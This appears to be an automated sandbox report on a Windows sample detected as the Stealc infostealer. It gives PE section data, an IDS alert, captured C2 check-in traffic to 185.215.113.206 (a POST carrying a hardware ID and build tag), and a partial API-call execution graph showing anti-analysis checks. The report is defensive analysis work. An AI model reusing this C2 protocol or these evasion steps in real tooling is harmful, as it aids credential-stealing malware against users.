                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x2b0.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      0x10000x2490000x162006049851021f57c341457c921aa13e977unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc0x24a0000x2b00x200c44f8c84def4bd609cee9c3e8c48cd27False0.794921875data6.073671984354682IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      0x24c0000x2ad0000x200e419e0d48a99ff88648109b18f77a1aeunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      kuxshahz0x4f90000x1a60000x1a56002ca4f70806780951d344b2e5c7ef1143False0.9946806168421833data7.953437289749726IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      horlowmv0x69f0000x10000x60013bd256a0ae2d1afecadf8c4f18a6667False0.6223958333333334data5.361304263343795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .taggant0x6a00000x30000x2200505eac359398b8ec9192709380cf03bcFalse0.053423713235294115DOS executable (COM)0.8195799666556177IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                      Resources

                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_MANIFEST0x69e1d00x256ASCII text, with CRLF line terminators0.5100334448160535

                      Imports

                      DLLImport
                      kernel32.dlllstrcpy

                      Network Behavior

                      Suricata IDS Alerts

                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                      2024-11-23T10:33:19.457814+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.849704185.215.113.20680TCP

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Nov 23, 2024 10:33:17.459475994 CET4970480192.168.2.8185.215.113.206
                      Nov 23, 2024 10:33:17.579591990 CET8049704185.215.113.206192.168.2.8
                      Nov 23, 2024 10:33:17.579673052 CET4970480192.168.2.8185.215.113.206
                      Nov 23, 2024 10:33:17.580102921 CET4970480192.168.2.8185.215.113.206
                      Nov 23, 2024 10:33:17.700726986 CET8049704185.215.113.206192.168.2.8
                      Nov 23, 2024 10:33:18.927041054 CET8049704185.215.113.206192.168.2.8
                      Nov 23, 2024 10:33:18.927155018 CET4970480192.168.2.8185.215.113.206
                      Nov 23, 2024 10:33:18.930485964 CET4970480192.168.2.8185.215.113.206
                      Nov 23, 2024 10:33:19.052683115 CET8049704185.215.113.206192.168.2.8
                      Nov 23, 2024 10:33:19.457628012 CET8049704185.215.113.206192.168.2.8
                      Nov 23, 2024 10:33:19.457813978 CET4970480192.168.2.8185.215.113.206
                      Nov 23, 2024 10:33:22.769968033 CET4970480192.168.2.8185.215.113.206

                      HTTP Request Dependency Graph

                      • 185.215.113.206

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.849704185.215.113.206802508C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Nov 23, 2024 10:33:17.580102921 CET90OUTGET / HTTP/1.1
                      Host: 185.215.113.206
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Nov 23, 2024 10:33:18.927041054 CET203INHTTP/1.1 200 OK
                      Date: Sat, 23 Nov 2024 09:33:18 GMT
                      Server: Apache/2.4.41 (Ubuntu)
                      Content-Length: 0
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Nov 23, 2024 10:33:18.930485964 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----AKFHCAKJDBKKEBFIIJJE
                      Host: 185.215.113.206
                      Content-Length: 211
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 42 33 30 46 46 38 44 34 43 42 45 32 30 39 39 39 32 35 32 38 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 2d 2d 0d 0a
                      Data Ascii: ------AKFHCAKJDBKKEBFIIJJEContent-Disposition: form-data; name="hwid"9B30FF8D4CBE2099925286------AKFHCAKJDBKKEBFIIJJEContent-Disposition: form-data; name="build"mars------AKFHCAKJDBKKEBFIIJJE--
                      Nov 23, 2024 10:33:19.457628012 CET210INHTTP/1.1 200 OK
                      Date: Sat, 23 Nov 2024 09:33:19 GMT
                      Server: Apache/2.4.41 (Ubuntu)
                      Content-Length: 8
                      Keep-Alive: timeout=5, max=99
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 59 6d 78 76 59 32 73 3d
                      Data Ascii: YmxvY2s=


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      System Behavior

                      General

                      Target ID:0
                      Start time:04:33:13
                      Start date:23/11/2024
                      Path:C:\Users\user\Desktop\file.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\file.exe"
                      Imagebase:0x4f0000
                      File size:1'832'448 bytes
                      MD5 hash:69CBCE48A9CE8B1DA7A0195AE4DFBCCC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1501268976.000000000101E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1442560518.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:5%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:16.3%
                        Total number of Nodes:1408
                        Total number of Limit Nodes:28
                        execution_graph 26988 512cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 26976 512853 lstrcpy 27000 503959 244 API calls 27005 5001d9 126 API calls 26989 513cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27030 5133c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27016 508615 49 API calls 26978 50e049 147 API calls 27031 508615 48 API calls 26979 518471 120 API calls 2 library calls 25539 511bf0 25591 4f2a90 25539->25591 25543 511c03 25544 511c29 lstrcpy 25543->25544 25545 511c35 25543->25545 25544->25545 25546 511c65 ExitProcess 25545->25546 25547 511c6d GetSystemInfo 25545->25547 25548 511c85 25547->25548 25549 511c7d ExitProcess 25547->25549 25692 4f1030 GetCurrentProcess VirtualAllocExNuma 25548->25692 25554 511ca2 25555 511cb8 25554->25555 25556 511cb0 ExitProcess 25554->25556 25704 512ad0 GetProcessHeap RtlAllocateHeap GetComputerNameA 25555->25704 25558 511ce7 lstrlen 25563 511cff 25558->25563 25559 511cbd 25559->25558 25913 512a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25559->25913 25561 511cd1 25561->25558 25566 511ce0 ExitProcess 25561->25566 25562 511d23 lstrlen 25564 511d39 25562->25564 25563->25562 25565 511d13 lstrcpy lstrcat 25563->25565 25567 511d5a 25564->25567 25568 511d46 lstrcpy lstrcat 25564->25568 25565->25562 25569 512ad0 3 API calls 25567->25569 25568->25567 25570 511d5f lstrlen 25569->25570 25572 511d74 25570->25572 25571 511d9a lstrlen 25573 511db0 25571->25573 25572->25571 25574 511d87 lstrcpy lstrcat 25572->25574 25575 511dce 25573->25575 25576 511dba lstrcpy lstrcat 25573->25576 25574->25571 25706 512a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25575->25706 25576->25575 25578 511dd3 lstrlen 25579 511de7 25578->25579 25580 511df7 lstrcpy lstrcat 25579->25580 25581 511e0a 25579->25581 25580->25581 25582 511e28 lstrcpy 25581->25582 25583 511e30 25581->25583 25582->25583 25584 511e56 OpenEventA 25583->25584 25585 511e68 CloseHandle Sleep OpenEventA 25584->25585 25586 511e8c CreateEventA 25584->25586 25585->25585 25585->25586 25707 511b20 GetSystemTime 25586->25707 25590 511ea5 CloseHandle ExitProcess 25914 4f4a60 25591->25914 25593 4f2aa1 25594 4f4a60 2 API calls 25593->25594 25595 4f2ab7 25594->25595 25596 4f4a60 2 API calls 25595->25596 25597 4f2acd 25596->25597 25598 4f4a60 2 API calls 25597->25598 25599 4f2ae3 25598->25599 25600 4f4a60 2 API calls 25599->25600 25601 4f2af9 25600->25601 25602 4f4a60 2 API calls 25601->25602 25603 4f2b0f 25602->25603 25604 4f4a60 2 API calls 25603->25604 25605 4f2b28 25604->25605 25606 4f4a60 2 API calls 25605->25606 25607 4f2b3e 25606->25607 25608 4f4a60 2 API calls 25607->25608 25609 4f2b54 25608->25609 25610 4f4a60 2 API calls 25609->25610 25611 4f2b6a 25610->25611 25612 4f4a60 2 API calls 25611->25612 25613 4f2b80 25612->25613 25614 4f4a60 2 API calls 25613->25614 25615 4f2b96 25614->25615 25616 4f4a60 2 API calls 25615->25616 25617 4f2baf 25616->25617 25618 4f4a60 2 API calls 25617->25618 25619 4f2bc5 25618->25619 25620 4f4a60 2 API calls 25619->25620 25621 4f2bdb 25620->25621 25622 4f4a60 2 API calls 25621->25622 25623 4f2bf1 25622->25623 25624 4f4a60 2 API calls 25623->25624 25625 4f2c07 25624->25625 25626 4f4a60 2 API calls 25625->25626 25627 4f2c1d 25626->25627 25628 4f4a60 2 API calls 25627->25628 25629 4f2c36 25628->25629 25630 4f4a60 2 API calls 25629->25630 25631 4f2c4c 25630->25631 25632 4f4a60 2 API calls 25631->25632 25633 4f2c62 25632->25633 25634 4f4a60 2 API calls 25633->25634 25635 4f2c78 25634->25635 25636 4f4a60 2 API calls 25635->25636 25637 4f2c8e 25636->25637 25638 4f4a60 2 API calls 25637->25638 25639 4f2ca4 25638->25639 25640 4f4a60 2 API calls 25639->25640 25641 4f2cbd 25640->25641 25642 4f4a60 2 API calls 25641->25642 25643 4f2cd3 25642->25643 25644 4f4a60 2 API calls 25643->25644 25645 4f2ce9 25644->25645 25646 4f4a60 2 API calls 25645->25646 25647 4f2cff 25646->25647 25648 4f4a60 2 API calls 25647->25648 25649 4f2d15 25648->25649 25650 4f4a60 2 API calls 25649->25650 25651 4f2d2b 25650->25651 25652 4f4a60 2 API calls 25651->25652 25653 4f2d44 25652->25653 25654 4f4a60 2 API calls 25653->25654 25655 4f2d5a 25654->25655 25656 4f4a60 2 API calls 25655->25656 25657 4f2d70 25656->25657 25658 4f4a60 2 API calls 25657->25658 25659 4f2d86 25658->25659 25660 4f4a60 2 API calls 25659->25660 25661 4f2d9c 25660->25661 25662 4f4a60 2 API calls 25661->25662 25663 4f2db2 25662->25663 25664 4f4a60 2 API calls 25663->25664 25665 4f2dcb 25664->25665 25666 4f4a60 2 API calls 25665->25666 25667 4f2de1 25666->25667 25668 4f4a60 2 API calls 25667->25668 25669 4f2df7 25668->25669 25670 4f4a60 2 API calls 25669->25670 25671 4f2e0d 25670->25671 25672 4f4a60 2 API calls 25671->25672 25673 4f2e23 25672->25673 25674 4f4a60 2 API calls 25673->25674 25675 4f2e39 25674->25675 25676 4f4a60 2 API calls 25675->25676 25677 4f2e52 25676->25677 25678 516390 GetPEB 25677->25678 25679 5165c3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 25678->25679 25680 5163c3 25678->25680 25681 516625 GetProcAddress 25679->25681 25682 516638 25679->25682 25687 5163d7 20 API calls 25680->25687 25681->25682 25683 516641 GetProcAddress GetProcAddress 25682->25683 25684 51666c 25682->25684 25683->25684 25685 516675 GetProcAddress 25684->25685 25686 516688 25684->25686 25685->25686 25688 516691 GetProcAddress 25686->25688 25689 5166a4 25686->25689 25687->25679 25688->25689 25690 5166d7 25689->25690 25691 5166ad GetProcAddress GetProcAddress 25689->25691 25690->25543 25691->25690 25693 4f105e VirtualAlloc 25692->25693 25694 4f1057 ExitProcess 25692->25694 25695 4f107d 25693->25695 25696 4f108a VirtualFree 25695->25696 25697 4f10b1 25695->25697 25696->25697 25698 4f10c0 25697->25698 25699 4f10d0 GlobalMemoryStatusEx 25698->25699 25701 4f1112 ExitProcess 25699->25701 25703 4f10f5 25699->25703 25702 4f111a GetUserDefaultLangID 25702->25554 25702->25555 25703->25701 25703->25702 25705 512b24 25704->25705 25705->25559 25706->25578 25919 511820 25707->25919 25709 511b81 sscanf 25958 4f2a20 25709->25958 25712 511bd6 25713 511be9 25712->25713 25714 511be2 ExitProcess 25712->25714 25715 50ffd0 25713->25715 25716 50ffe0 25715->25716 25717 510019 lstrlen 25716->25717 25718 51000d lstrcpy 25716->25718 25719 5100d0 25717->25719 25718->25717 25720 5100e7 lstrlen 25719->25720 25721 5100db lstrcpy 25719->25721 25722 5100ff 25720->25722 25721->25720 25723 510116 lstrlen 25722->25723 25724 51010a lstrcpy 25722->25724 25725 51012e 25723->25725 25724->25723 25726 510145 25725->25726 25727 510139 lstrcpy 25725->25727 25960 511570 25726->25960 25727->25726 25730 51016e 25731 510183 lstrcpy 25730->25731 25732 51018f lstrlen 25730->25732 25731->25732 25733 5101a8 25732->25733 25734 5101c9 lstrlen 25733->25734 25735 5101bd lstrcpy 25733->25735 25736 5101e8 25734->25736 25735->25734 25737 510200 lstrcpy 25736->25737 25738 51020c lstrlen 25736->25738 25737->25738 25739 51026a 25738->25739 25740 510282 lstrcpy 25739->25740 25741 51028e 25739->25741 25740->25741 25970 4f2e70 25741->25970 25749 510540 25750 511570 4 API calls 25749->25750 25751 51054f 25750->25751 25752 5105a1 lstrlen 25751->25752 25753 510599 lstrcpy 25751->25753 25754 5105bf 25752->25754 25753->25752 25755 5105d1 lstrcpy lstrcat 25754->25755 25756 5105e9 25754->25756 25755->25756 25757 510614 25756->25757 25758 51060c lstrcpy 25756->25758 25759 51061b lstrlen 25757->25759 25758->25757 25760 510636 25759->25760 25761 51064a lstrcpy lstrcat 25760->25761 25762 510662 25760->25762 25761->25762 25763 510687 25762->25763 25764 51067f lstrcpy 25762->25764 25765 51068e lstrlen 25763->25765 25764->25763 25766 5106b3 25765->25766 25767 5106c7 lstrcpy lstrcat 25766->25767 25768 5106db 25766->25768 25767->25768 25769 510704 lstrcpy 25768->25769 25770 51070c 25768->25770 25769->25770 25771 510751 25770->25771 25772 510749 lstrcpy 25770->25772 26726 512740 GetWindowsDirectoryA 25771->26726 25772->25771 25774 510785 26735 4f4c50 25774->26735 25775 51075d 25775->25774 25776 51077d lstrcpy 25775->25776 25776->25774 25778 51078f 26889 508ca0 StrCmpCA 25778->26889 25780 51079b 25781 4f1530 8 API calls 25780->25781 25782 5107bc 25781->25782 25783 5107e5 lstrcpy 25782->25783 25784 5107ed 25782->25784 25783->25784 26907 4f60d0 80 API calls 25784->26907 25786 5107fa 26908 5081b0 10 API calls 25786->26908 25788 510809 25789 4f1530 8 API calls 25788->25789 25790 51082f 25789->25790 25791 510856 lstrcpy 25790->25791 25792 51085e 25790->25792 25791->25792 26909 4f60d0 80 API calls 25792->26909 25794 51086b 26910 507ee0 lstrlen lstrcpy StrCmpCA StrCmpCA StrCmpCA 25794->26910 25796 510876 25797 4f1530 8 API calls 25796->25797 25798 5108a1 25797->25798 25799 5108d5 25798->25799 25800 5108c9 lstrcpy 25798->25800 26911 4f60d0 80 API calls 25799->26911 25800->25799 25802 5108db 26912 508050 lstrlen lstrcpy StrCmpCA lstrlen lstrcpy 25802->26912 25804 5108e6 25805 4f1530 8 API calls 25804->25805 25806 5108f7 25805->25806 25807 510926 lstrcpy 25806->25807 25808 51092e 25806->25808 25807->25808 26913 4f5640 8 API calls 25808->26913 25810 510933 25811 4f1530 8 API calls 25810->25811 25812 51094c 25811->25812 26914 507280 1498 API calls 25812->26914 25814 51099f 25815 4f1530 8 API calls 25814->25815 25816 5109cf 25815->25816 25817 5109f6 lstrcpy 25816->25817 25818 5109fe 25816->25818 25817->25818 26915 4f60d0 80 API calls 25818->26915 25820 510a0b 26916 5083e0 7 API calls 25820->26916 25822 510a18 25823 4f1530 8 API calls 25822->25823 25824 510a29 25823->25824 26917 4f24e0 230 API calls 25824->26917 25826 510a6b 25827 510b40 25826->25827 25828 510a7f 25826->25828 25830 4f1530 8 API calls 25827->25830 25829 4f1530 8 API calls 25828->25829 25831 510aa5 25829->25831 25832 510b59 25830->25832 25834 510ad4 25831->25834 25835 510acc lstrcpy 25831->25835 25833 510b87 25832->25833 25836 510b7f lstrcpy 25832->25836 26921 4f60d0 80 API calls 25833->26921 26918 4f60d0 80 API calls 25834->26918 25835->25834 25836->25833 25839 510b8d 26922 50c840 70 API calls 25839->26922 25840 510ada 26919 5085b0 47 API calls 25840->26919 25843 510b38 25846 510bd1 25843->25846 25847 4f1530 8 API calls 25843->25847 25844 510ae5 25845 4f1530 8 API calls 25844->25845 25849 510af6 25845->25849 25848 510bfa 25846->25848 25852 4f1530 8 API calls 25846->25852 25851 510bb9 25847->25851 25853 510c23 25848->25853 25854 4f1530 8 API calls 25848->25854 26920 50d0f0 118 API calls 25849->26920 26923 50d7b0 103 API calls __setmbcp_nolock 25851->26923 25857 510bf5 25852->25857 25856 510c4c 25853->25856 25860 4f1530 8 API calls 25853->25860 25858 510c1e 25854->25858 25861 510c75 25856->25861 25867 4f1530 8 API calls 25856->25867 26925 50dfa0 149 API calls 25857->26925 26926 50e500 108 API calls 25858->26926 25859 510bbe 25865 4f1530 8 API calls 25859->25865 25866 510c47 25860->25866 25863 510c9e 25861->25863 25868 4f1530 8 API calls 25861->25868 25870 510cc7 25863->25870 25875 4f1530 8 API calls 25863->25875 25869 510bcc 25865->25869 26927 50e720 120 API calls 25866->26927 25872 510c70 25867->25872 25873 510c99 25868->25873 26924 50ecb0 98 API calls 25869->26924 25876 510cf0 25870->25876 25882 4f1530 8 API calls 25870->25882 26928 50e9e0 110 API calls 25872->26928 26929 4f7bc0 154 API calls 25873->26929 25881 510cc2 25875->25881 25878 510d04 25876->25878 25879 510dca 25876->25879 25883 4f1530 8 API calls 25878->25883 25884 4f1530 8 API calls 25879->25884 26930 50eb70 108 API calls 25881->26930 25886 510ceb 25882->25886 25888 510d2a 25883->25888 25890 510de3 25884->25890 26931 5141e0 91 API calls 25886->26931 25891 510d56 lstrcpy 25888->25891 25892 510d5e 25888->25892 25889 510e11 26935 4f60d0 80 API calls 25889->26935 25890->25889 25893 510e09 lstrcpy 25890->25893 25891->25892 26932 4f60d0 80 API calls 25892->26932 25893->25889 25896 510e17 26936 50c840 70 API calls 25896->26936 25897 510d64 26933 5085b0 47 API calls 25897->26933 25899 510dc2 25903 4f1530 8 API calls 25899->25903 25901 510d6f 25902 4f1530 8 API calls 25901->25902 25904 510d80 25902->25904 25907 510e39 25903->25907 26934 50d0f0 118 API calls 25904->26934 25906 510e67 26937 4f60d0 80 API calls 25906->26937 25907->25906 25908 510e5f lstrcpy 25907->25908 25908->25906 25910 510e74 25912 510e95 25910->25912 26938 511660 12 API calls 25910->26938 25912->25590 25913->25561 25915 4f4a76 RtlAllocateHeap 25914->25915 25918 4f4ab4 VirtualProtect 25915->25918 25918->25593 25920 51182e 25919->25920 25921 511855 lstrlen 25920->25921 25922 511849 lstrcpy 25920->25922 25923 511873 25921->25923 25922->25921 25924 511885 lstrcpy lstrcat 25923->25924 25925 511898 25923->25925 25924->25925 25926 5118c7 25925->25926 25927 5118bf lstrcpy 25925->25927 25928 5118ce lstrlen 25926->25928 25927->25926 25929 5118e6 25928->25929 25930 5118f2 lstrcpy lstrcat 25929->25930 25931 511906 25929->25931 25930->25931 25932 511935 25931->25932 25933 51192d lstrcpy 25931->25933 25934 51193c lstrlen 25932->25934 25933->25932 25935 511958 25934->25935 25936 51196a lstrcpy lstrcat 25935->25936 25937 51197d 25935->25937 25936->25937 25938 5119ac 25937->25938 25939 5119a4 lstrcpy 25937->25939 25940 5119b3 lstrlen 25938->25940 25939->25938 25941 5119cb 25940->25941 25942 5119d7 lstrcpy lstrcat 25941->25942 25943 5119eb 25941->25943 25942->25943 25944 511a1a 25943->25944 25945 511a12 lstrcpy 25943->25945 25946 511a21 lstrlen 25944->25946 25945->25944 25947 511a3d 25946->25947 25948 511a4f lstrcpy lstrcat 25947->25948 25949 511a62 25947->25949 25948->25949 25950 511a91 25949->25950 25951 511a89 lstrcpy 25949->25951 25952 511a98 lstrlen 25950->25952 25951->25950 25954 511ab4 25952->25954 25953 511ad9 25956 511b00 lstrcpy 25953->25956 25957 511b08 25953->25957 25954->25953 25955 511ac6 lstrcpy lstrcat 25954->25955 25955->25953 25956->25957 25957->25709 25959 4f2a24 SystemTimeToFileTime SystemTimeToFileTime 25958->25959 25959->25712 25959->25713 25961 51157f 25960->25961 25962 51159f lstrcpy 25961->25962 25963 5115a7 25961->25963 25962->25963 25964 5115d7 lstrcpy 25963->25964 25965 5115df 25963->25965 25964->25965 25966 51160f lstrcpy 25965->25966 25967 511617 25965->25967 25966->25967 25968 510155 lstrlen 25967->25968 25969 511647 lstrcpy 25967->25969 25968->25730 25969->25968 25971 4f4a60 2 API calls 25970->25971 25972 4f2e82 25971->25972 25973 4f4a60 2 API calls 25972->25973 25974 4f2ea0 25973->25974 25975 4f4a60 2 API calls 25974->25975 25976 4f2eb6 25975->25976 25977 4f4a60 2 API calls 25976->25977 25978 4f2ecb 25977->25978 25979 4f4a60 2 API calls 25978->25979 25980 4f2eec 25979->25980 25981 4f4a60 2 API calls 25980->25981 25982 4f2f01 25981->25982 25983 4f4a60 2 API calls 25982->25983 25984 4f2f19 25983->25984 25985 4f4a60 2 API calls 25984->25985 25986 4f2f3a 25985->25986 25987 4f4a60 2 API calls 25986->25987 25988 4f2f4f 25987->25988 25989 4f4a60 2 API calls 25988->25989 25990 4f2f65 25989->25990 25991 4f4a60 2 API calls 25990->25991 25992 4f2f7b 25991->25992 25993 4f4a60 2 API calls 25992->25993 25994 4f2f91 25993->25994 25995 4f4a60 2 API calls 25994->25995 25996 4f2faa 25995->25996 25997 4f4a60 2 API calls 25996->25997 25998 4f2fc0 25997->25998 25999 4f4a60 2 API calls 25998->25999 26000 4f2fd6 25999->26000 26001 4f4a60 2 API calls 26000->26001 26002 4f2fec 26001->26002 26003 4f4a60 2 API calls 26002->26003 26004 4f3002 26003->26004 26005 4f4a60 2 API calls 26004->26005 26006 4f3018 26005->26006 26007 4f4a60 2 API calls 26006->26007 26008 4f3031 26007->26008 26009 4f4a60 2 API calls 26008->26009 26010 4f3047 26009->26010 26011 4f4a60 2 API calls 26010->26011 26012 4f305d 26011->26012 26013 4f4a60 2 API calls 26012->26013 26014 4f3073 26013->26014 26015 4f4a60 2 API calls 26014->26015 26016 4f3089 26015->26016 26017 4f4a60 2 API calls 26016->26017 26018 4f309f 26017->26018 26019 4f4a60 2 API calls 26018->26019 26020 4f30b8 26019->26020 26021 4f4a60 2 API calls 26020->26021 26022 4f30ce 26021->26022 26023 4f4a60 2 API calls 26022->26023 26024 4f30e4 26023->26024 26025 4f4a60 2 API calls 26024->26025 26026 4f30fa 26025->26026 26027 4f4a60 2 API calls 26026->26027 26028 4f3110 26027->26028 26029 4f4a60 2 API calls 26028->26029 26030 4f3126 26029->26030 26031 4f4a60 2 API calls 26030->26031 26032 4f313f 26031->26032 26033 4f4a60 2 API calls 26032->26033 26034 4f3155 26033->26034 26035 4f4a60 2 API calls 26034->26035 26036 4f316b 26035->26036 26037 4f4a60 2 API calls 26036->26037 26038 4f3181 26037->26038 26039 4f4a60 2 API calls 26038->26039 26040 4f3197 26039->26040 26041 4f4a60 2 API calls 26040->26041 26042 4f31ad 26041->26042 26043 4f4a60 2 API calls 26042->26043 26044 4f31c6 26043->26044 26045 4f4a60 2 API calls 26044->26045 26046 4f31dc 26045->26046 26047 4f4a60 2 API calls 26046->26047 26048 4f31f2 26047->26048 26049 4f4a60 2 API calls 26048->26049 26050 4f3208 26049->26050 26051 4f4a60 2 API calls 26050->26051 26052 4f321e 26051->26052 26053 4f4a60 2 API calls 26052->26053 26054 4f3234 26053->26054 26055 4f4a60 2 API calls 26054->26055 26056 4f324d 26055->26056 26057 4f4a60 2 API calls 26056->26057 26058 4f3263 26057->26058 26059 4f4a60 2 API calls 26058->26059 26060 4f3279 26059->26060 26061 4f4a60 2 API calls 26060->26061 26062 4f328f 26061->26062 26063 4f4a60 2 API calls 26062->26063 26064 4f32a5 26063->26064 26065 4f4a60 2 API calls 26064->26065 26066 4f32bb 26065->26066 26067 4f4a60 2 API calls 26066->26067 26068 4f32d4 26067->26068 26069 4f4a60 2 API calls 26068->26069 26070 4f32ea 26069->26070 26071 4f4a60 2 API calls 26070->26071 26072 4f3300 26071->26072 26073 4f4a60 2 API calls 26072->26073 26074 4f3316 26073->26074 26075 4f4a60 2 API calls 26074->26075 26076 4f332c 26075->26076 26077 4f4a60 2 API calls 26076->26077 26078 4f3342 26077->26078 26079 4f4a60 2 API calls 26078->26079 26080 4f335b 26079->26080 26081 4f4a60 2 API calls 26080->26081 26082 4f3371 26081->26082 26083 4f4a60 2 API calls 26082->26083 26084 4f3387 26083->26084 26085 4f4a60 2 API calls 26084->26085 26086 4f339d 26085->26086 26087 4f4a60 2 API calls 26086->26087 26088 4f33b3 26087->26088 26089 4f4a60 2 API calls 26088->26089 26090 4f33c9 26089->26090 26091 4f4a60 2 API calls 26090->26091 26092 4f33e2 26091->26092 26093 4f4a60 2 API calls 26092->26093 26094 4f33f8 26093->26094 26095 4f4a60 2 API calls 26094->26095 26096 4f340e 26095->26096 26097 4f4a60 2 API calls 26096->26097 26098 4f3424 26097->26098 26099 4f4a60 2 API calls 26098->26099 26100 4f343a 26099->26100 26101 4f4a60 2 API calls 26100->26101 26102 4f3450 26101->26102 26103 4f4a60 2 API calls 26102->26103 26104 4f3469 26103->26104 26105 4f4a60 2 API calls 26104->26105 26106 4f347f 26105->26106 26107 4f4a60 2 API calls 26106->26107 26108 4f3495 26107->26108 26109 4f4a60 2 API calls 26108->26109 26110 4f34ab 26109->26110 26111 4f4a60 2 API calls 26110->26111 26112 4f34c1 26111->26112 26113 4f4a60 2 API calls 26112->26113 26114 4f34d7 26113->26114 26115 4f4a60 2 API calls 26114->26115 26116 4f34f0 26115->26116 26117 4f4a60 2 API calls 26116->26117 26118 4f3506 26117->26118 26119 4f4a60 2 API calls 26118->26119 26120 4f351c 26119->26120 26121 4f4a60 2 API calls 26120->26121 26122 4f3532 26121->26122 26123 4f4a60 2 API calls 26122->26123 26124 4f3548 26123->26124 26125 4f4a60 2 API calls 26124->26125 26126 4f355e 26125->26126 26127 4f4a60 2 API calls 26126->26127 26128 4f3577 26127->26128 26129 4f4a60 2 API calls 26128->26129 26130 4f358d 26129->26130 26131 4f4a60 2 API calls 26130->26131 26132 4f35a3 26131->26132 26133 4f4a60 2 API calls 26132->26133 26134 4f35b9 26133->26134 26135 